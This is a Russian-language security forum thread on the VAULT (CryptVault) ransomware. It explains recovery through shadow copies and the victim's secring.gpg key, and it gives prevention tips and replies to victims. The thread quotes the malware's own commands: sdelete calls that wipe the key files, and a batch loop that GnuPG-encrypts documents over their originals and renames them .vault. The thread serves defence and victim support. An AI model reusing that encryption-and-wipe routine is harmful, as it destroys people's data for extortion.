[ Закрыто ] VAULT. что делать? , bat encoder / CryptVault

RSS


Если вам необходимо восстановить документы зашифрованные VAULT, выполните следующие действия:

1. проверьте наличие теневых копий на дисках, если есть чистые теневые копии, восстановить документы можно без расшифровки.
Используйте для работы с теневыми копиями ShadowExplorer

если теневые копии отсутствуют, возможно были отключены шифратором, восстановите (на будущее) через настройки защиты дисков резервирование
пространства в 5-10% под теневые копии.

2. если теневые и архивные копии отсутствуют, вы можете попытаться самостоятельно выполнить расшифровку документов.
для этого необходимо найти файл secring.gpg.
secring.gpg(sec key) здесь нужен не любой, не найденный по дороге домой из сетевого форума, а созданный на вашей машине (как правило в %TEMP%
юзера) в момент запуска процесса шифрования. Хотя вероятность успешного поиска secring.gpg невелика, поскольку шифратор тщательно затирает
данный ключ с помощью утилиты sdelete.exe.

Цитата
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\secring.gpg"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\vaultkey.vlt"
"%temp%\sdelete.exe" /accepteula -p 4 -q "%temp%\confclean.list"
Повторный запуск шифратора с целью получения этого ключа не поможет. ключ будет создан уже с другим отпечатком и ID, и для расшифровки ваших документов
не подойдет. пробуйте искать данный ключ среди удаленных файлов, но обязательно ненулевого размера. ~1Кб.

что делает шифратор с исходными файлами:
Код
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\svchost.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& rename "%%i" "%%~nxi.vault">> "%temp%\cryptlist.lst"
echo %%i>> "%temp%\conf.list"
)

после шифрования к примеру файла 1.doc рядом с ним создается зашифрованный файл 1.doc.gpg, затем зашифрованный 1.doc.gpg перемещается на место исходного_чистого с новым именем 1.doc,
и только затем переименовывается в 1.doc.vault.
т.о. исходный файл не удаляется, а перезаписывается зашифрованным документом с целью невозможности его восстановления.
-------
Добавим,  что злоумышленники после завершения шифрования оставляют на диске файлы  VAULT.KEY и CONFIRMATION.KEY. Первый содержит экспортированный secring.gpg,
но зашифрованный с помощью pub key злоумышленников, поэтому  расшифровать его на нашей стороне невозможно.
В CONFIRMATION.KEY содержится полный список зашифрованных файлов. Оба эти файла оставлены на диске в качестве жеста "доброй, но и злой" воли
с  целью "протянуть руку товарищеской, но платной помощи" пострадавшему юзеру.
--------
если sec key найден, вы можете установить GnuPG и GPGShell и проверить возможность расшифровки.

скачайте отсюда и установите GnuPG
+
отсюда можно скачать GPGShell

В GPGShell удобно (из контекстного меню) выполнять различные действия над файлами и ключами.
+
После установки в каталоге так же можно найти подробный мануал (gpg.man) по консольным командам в GnuPG.
-----------

как можно избежать встречи с VAULT?
1. будьте предельно внимательны при работе с почтой.
если вложенный в сообщение или добавленный по ссылке архив содержит исполняемые файлы *.exe, *.com, *.pif, *.js, *.cmd, *.scr, *.bat, то такой документ никак не может быть офисным документом.
Значит вас вводят в заблуждение, выдавая черное за белое.
2. настройте самостоятельно или попросите админа настроить политики ограниченного запуска исполняемых программ из вложенных архивов.
например:
Цитата
%userprofile%\Local Settings\Temp\_tc\*.js
%userprofile%\Appdata\Local\Temp\_tc\*.js
3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg.
в любом случае, в данной модификации энкодера (если он использует GnuPG) после скачивания и запуска утилита gpg.exe (которая может быть переименована и упакована как угодно) вначале будет создавать ключевую
пару pubring.gpg/secring.gpg, а затем уже - шифровать ваши данные с помощью созданных ключей.

4. Если предварительно положить (и защитить от изменения) известный вам ключ pubring.gpg, то в этом случае
шифрование состоится, но известным ключом. Или не состоится.

(с), chklst.ru

Ответы

Александр,
вышлите в почту safety@chklst.ru ключ secring.gpg и несколько зашифрованных файлов для проверки возможности расшифровки
Цитата
santy написал:
Александр,
вышлите в почту safety@chklst.ru ключ secring.gpg и несколько зашифрованных файлов для проверки возможности расшифровки
отправил
к сожалению, ключ не рабочий.
Цитата
santy написал:
Александр,
вышлите в почту safety@chklst.ru ключ secring.gpg и несколько зашифрованных файлов для проверки возможности расшифровки
Только что Вам отправил, надеюсь у Вас получиться все. Может в спам сейчас попадем мое письмо. Жду Вашего рассмотрения, помощи.
Александр Подлесный,
ключ secring.gpg
(gpg: key DB754423: already in secret keyring)
не имеет отношения к вашим зашифрованным файлам.
они зашифрованы новым вариантом шифратора, который использует другой алгоритм шифрования. не openPGP

gpg: no valid OpenPGP data found.
gpg: processing message failed: eof

File: X:\viruses\shifratory\VAULT.new\22\Акт приема-передачи  материальныценностей.docx.vault
Time: 07.11.2015 23:13:27 (07.11.2015 17:13:27 UTC)
Изменено: santy - 07.11.2015 20:17:59
Цитата
santy написал:
Александр,
для расшифровки своими силами этих файлов недостаточно. нужен ваш secring.gpg
http://chklst.ru/forum/discussion/1481/vault-chto-delat

для расшифровки документов с помощью мошенников (и за деньги), этого достаточно, поскольку у них есть секретный ключ к VAULT.key
Добрый день! мой компьютер также был подвержен атаке VAULT.
на своем компьютере я нашла  secring.gpg, но что мне делать с ним далее?
Сира,
вышлите в почту safety@chklst.ru найденный ключ secring.gpg а так же несколько зашифрованных документов
для проверки возможности расшифровки.
Цитата
santy написал:
3. Пробуйте с помощью HIPS запретить запись в файл %TEMP%\pubring.gpg.
Запрещать на каждой машине по отдельности? через системные переменные вроде не работают правила.
да, не работают.
но это рекомендации больше домашнему пользователю относится.
+ бат-энкодер пока не актуален.
Цитата
santy написал:
да, не работают.
но это рекомендации больше домашнему пользователю относится.
+ бат-энкодер пока не актуален.
А для недомашних есть групповые политики.

Кстати, до меня недавно дошло, что через HIPS очень удобно папки с бэкапами защищать.
Одно правило запрещает для этой папки запись и удаление,
а второе разрешает это программе, которая делает бэкап.
Читают тему (гостей: 1)